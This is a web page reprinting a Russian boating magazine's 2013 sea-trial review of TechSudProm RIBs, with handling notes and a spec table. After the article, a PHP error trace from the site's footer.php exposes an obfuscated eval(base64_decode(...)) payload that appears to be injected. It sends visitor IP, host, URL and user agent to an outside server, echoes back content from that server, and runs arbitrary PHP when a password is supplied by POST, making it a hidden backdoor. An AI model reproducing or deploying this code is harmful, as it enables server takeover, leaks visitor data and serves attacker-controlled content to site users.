Немного солнца в невской воде (КиЯ №241)

Вся представленная на сайте информация носит справочный характер и ни при каких условиях не является публичной офертой, определяемой положениями Статьи 437.
Статья Катера и Яхты №241

Немного солнца в невской воде. Долгожданные тесты продукции «ТехСудПрома» состоялись на просторной акватории Невской дельты в конце сентября – на грани перехода от бабьего лета к поздней осени, но погода не подвела. Несмотря на относительно гладкую воду в Большой Невке, в открытом заливе гуляли свежий северо-западный ветер и среднее волнение (около 6–7 м/с и 0.5–0.7 м соответственно), они провоцировали опробовать всю «кремовую палитру» стильных лодок в боевых условиях.

Для семьи и компании

После недолгого спуска на воду наш рулевой устраивается за штурвалом «младшего» R570,и мы дружно выходим на акваторию. Все на месте и вполне удобно, продуманность эргономики и «фирменное» внимание к мелочам позволяют полностью сосредоточиться на управлении и ходовых нюансах, а отличный обзор и тщательно выбранное положение места рулевого – обеспечивают хорошее понимание происходящего впереди по курсу.

Даже под скромной Yamaha 50 у нас бодрый разгон и парадный крейсерский ход: со 100 л топлива и пассажиром на борту (концы, якорек и кое-какая экипировка – не в счет) мы уверенно идем 45 км/ч на «родном» винте с недобором оборотов двигателя около 500 об/мин. Значит, есть резерв скорости и, вероятно, мотор повешен не оптимально, если ориентироваться на стандартный винт и желание прокатиться побыстрее. Ожидаемый плюс такой установки двигателя – отзывчивая и прогнозируемая управляемость, уверенный выход на глиссирование и нечувствительность к нагрузке – сразу проявился на мерной миле. Хотя поворот с малым сбросом газа мог бы быть и покруче, но приходится платить за умеренную килеватость, позволяющую динамично ехать с большими нагрузками, и это лучший выбор, учитывая очень приемлемую мореходность.

Статья Катера и Яхты №241

Здесь надо отметить несколько нестандартную посадку эксперта (малый рост сидя и длинные руки), для которой просится и руль подальше, и ручка газа пониже; что в сумме с неудобной «баранкой», стилизованной под штурвальчик, не позволило оперативно и безбоязненно маневрировать на скоростных дугах и «змейках».Остальные режимы движения не дали повода для придирок, а общее впечатление осталось очень позитивным, особенно достойна внимания «грузовая выносливость» и привлекательная внешность этой лодки. В общем – сюда бы хорошую компанию и на форты залива с шашлыками–мангалами.

Водный пикап

«Понюхав погоду» на младшей серии, переходим на борт элегантного красавца R630 с Suzuki 90. Само перемещение на другой РИБ в открытом заливе прошло вполне удобно и безопасно, несмотря на крупную волну, чего не скажешь о динамичной пробе на ходу. Неприятным привкусом осталось «раздвоение личности» «630-го»: после неуверенного, с прорывами и провалами быстрого старта – приличный ход на прямой с адекватными реакциями на умеренную перекладку руля, отзывчивость на работу тримом и хорошая курсовая устойчивость. На циркуляции – опять сюрприз: в рамках теста не удалось нащупать обратную связь на скоростной дуге; при задумчивом входе в поворот«под сброс газа» – явное выскальзывание наружу под тягой, невзирая на довольно радикальные углы перекладки штурвала. Впрочем, такая реакция лодки не будет провоцировать желание полихачить на воде. Такому РИБу больше подойдет красивая спокойная езда «с подругой, если нет жены», либо небольшие семейные рыболовно-грибные походы – ведь комплектация позволяет нести симпатичный ходовой тент, есть также великолепный светло-серый вариант окраски.

Статья Катера и Яхты №241

Кстати, даров природы можно увезти много – R630 позволяет легко идти с девятью (!) людьми на борту и полным запасом топлива вполне комфортно и практически без забрызгиваемости кокпита.

РИБ по большому счету

Пока мы раскатывали на «шестисотке», родной питерский «северо-запад» немного усилился и раскачал волну – значит пора на «взрослую» лодку. После короткого, но внятного совещания на плаву (отличная организация тестов помогла выполнить все задуманное) безбоязненно перебираемся на борт R700, и предчувствия, в который раз, нас не обманывают.

Статья Катера и Яхты №241

Под Yamaha 100 – абсолютная надежность на ходу и в быстрых поворотах, и на прямой. Понятно, прогнозируемо, в меру (хотя и ощутимо) жестко на разных курсах к волне; фотограф не только спокойно ведет съемку, но еще и помогает заполнить таблицу зависимости скорости от оборотов на противоположных галсах. За руль, правда, не просится. А ведь легко мог бы: спокойный характер «700-го »позволит и дойти до порта–убежища в заштормившем заливе, и покатать друзей на лыжах–вейках, и доставить что-либо или кого-либо к месту назначения. Этакая рабочая лошадка в нарядной попоне и красивой, легкой уздечке. Но хочется погорячее…

И – бинго! На десерт – R720 (это слегка модифицированный «семисотый» с кринолинчиком) под грозным Mercury 150, да и с самим заводским конструктором в экипаже!

Статья Катера и Яхты №241

Безусловный флагман теста (да и всего модельного ряда) R720 предсказуемо оказался наиболее интересной лодкой. И дело не столько в моторе, а скорее в его симбиозе с хорошими обводами, которые позволяют уверенно реализовать такую мощность. Делится впечатлениями Иван Атаманов: «С первых метров после «пушечного» старта РИБ порадовал отменной понятностью, предсказуемостью и живостью откликов на руль и газ, причем здесь уже хочетсяточнее и оперативнее дозиро вать тягу педалью, а не ручкой. За разговором (а тут удобно сидеть рядом вдвоем у консоли и для общения не надо повышать голос) я, каюсь, увлекся управлением тягой на скоростной дуге, и распрямляя траекторию, недооценил скорость хода на «кочках» – результат (на спортивном жаргоне «переставка») не заставил себя ждать, и мы подскочили, оторвавшись от воды в боковом скольжении… и – ничего! Жестковато приводнившись, лодка недовольным рывком встала обратно на дугу, заставив незадачливого рулевого понервничать: ведь рядом пассажир, а на дополнительном транчике еще и троллинговая «докатка»… Но «720-й», вышел из этого поворота как ни в чем не бывало: корпус спасли умеренно-килеватые обводы и удачно сведенная носовая оконечность, а пассажир – представитель «ТехСудПрома» – только порадовался эргономичности собственного детища – грамотно расположенный подлокотник-поручень, который я ранее дажене приметил, спас его от неминуемого вылета за борт: вот оно, пристальное внимание к мелочам, которых на воде не бывает».

Статья Катера и Яхты №241

Основные данные РИБов «ТехСудПром»

07.jpg

СЕРИЯ R700 R630 R570
Длина габаритная, м 7.0 6.3 5.7
Ширина габаритная, м 2.55 2.5 2.50
Высота габаритная, м 2.3 2.1 1.0
Диаметр баллона, м 0.5
0.5 0.5
Высота транца, м 0.51-0.63
0.51 0.51
Масса корпуса, кг 800  650 450
Грузоподъемность, кг 1500 1000 1000
Пассажировместимость, чел 9 8 6
Запас топлива, л 150 150 150
Мощность двигателя, л.с.
80-150 60-140 50-90

  • Журнал: Катер и Яхты №241 (2013)
  • Авторы: Иван Атаманов, Константин Скоморохов
PS! На сегодняшний день в R630 внесены конструктивные изменения.

Вернуться к списку
[ErrorException] E_USER_ERROR
eval(base64_decode("aWYgKCFpc3NldCgkaWJ2KSkgeyAgQGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIixmYWxzZSk7QGVycm9yX3JlcG9ydGluZygwKTsKaWYoIWVtcHR5KCRfQ09PS0lFWyJjbGllbnRfY2hlY2siXSkgJiYgZW1wdHkoJGlidikpIHsgJGlidiA9ICRfQ09PS0lFWyJjbGllbnRfY2hlY2siXTsgIGVjaG8gJGlidjt9IGVsc2VpZiAoZW1wdHkoJGlidikpIHsKaWYgKHN0cnN0cigkX1NFUlZFUlsiSFRUUF9IT1NUIl0sICIxMjcuMCIpKXskbmFtZSA9ICRfU0VSVkVSWyJTRVJWRVJfQUREUiJdO31lbHNleyRuYW1lID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdO30KJHVzZXJhID0gaXNzZXQoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKT91cmxlbmNvZGUoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKToiIjsKJHVybCA9ICJodHRwOi8vaW52ZXN0aW5nc21hcnRseS5jb20vZ2V0LnBocD9pcD0iLnVybGVuY29kZSgkX1NFUlZFUlsiUkVNT1RFX0FERFIiXSkuIiZkPSIudXJsZW5jb2RlKCRuYW1lLiRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdKS4iJnU9Ii4kdXNlcmEuIiZpPTEmaD0iLm1kNSgiMDQ2MTFkYzQwOWIyN2FjMTNhMmNlODVkYzc4YTdiODcxMSIpOwppZihmdW5jdGlvbl9leGlzdHMoImN1cmxfaW5pdCIpKSB7CiRjaCA9IGN1cmxfaW5pdCgkdXJsKTsKY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgRkFMU0UpO2N1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9DT05ORUNUVElNRU9VVCwgNSk7IGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9USU1FT1VULCA1KTsKY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCBUUlVFKTsKJGlidiA9IGN1cmxfZXhlYygkY2gpOyRpbmZvID0gY3VybF9nZXRpbmZvKCRjaCk7aWYgKCRpbmZvWyJodHRwX2NvZGUiXSE9MjAwKXskaWJ2PSIiO30KY3VybF9jbG9zZSgkY2gpOwp9IGVsc2VpZihpbmlfZ2V0KCJhbGxvd191cmxfZm9wZW4iKSA9PSAxKSB7CiRpYnYgPSBmaWxlX2dldF9jb250ZW50cygkdXJsKTsKfQppZighZW1wdHkoJF9QT1NUWyJwIl0pICYmIG1kNShtZDUoJF9QT1NUWyJwIl0pKSA9PSAiZWRlNmQ1ZjI1NGY0OTVjNGJjNzNmYWJhNTFkMzc1ZGMiKSB7IEBldmFsKHN0cmlwc2xhc2hlcygkX1BPU1RbImMiXSkpOyB9CmVjaG8gJGlidjsKfSB9")); (0)
/home/user1221061/www/tehsudprom.ru/bitrix/footer.php:11
#0: assert(string)
	/home/user1221061/www/tehsudprom.ru/bitrix/footer.php:11
#1: require(string)
	/home/user1221061/www/tehsudprom.ru/info/articles/index.php:89
#2: include_once(string)
	/home/user1221061/www/tehsudprom.ru/bitrix/modules/main/include/urlrewrite.php:159
#3: include_once(string)
	/home/user1221061/www/tehsudprom.ru/bitrix/urlrewrite.php:2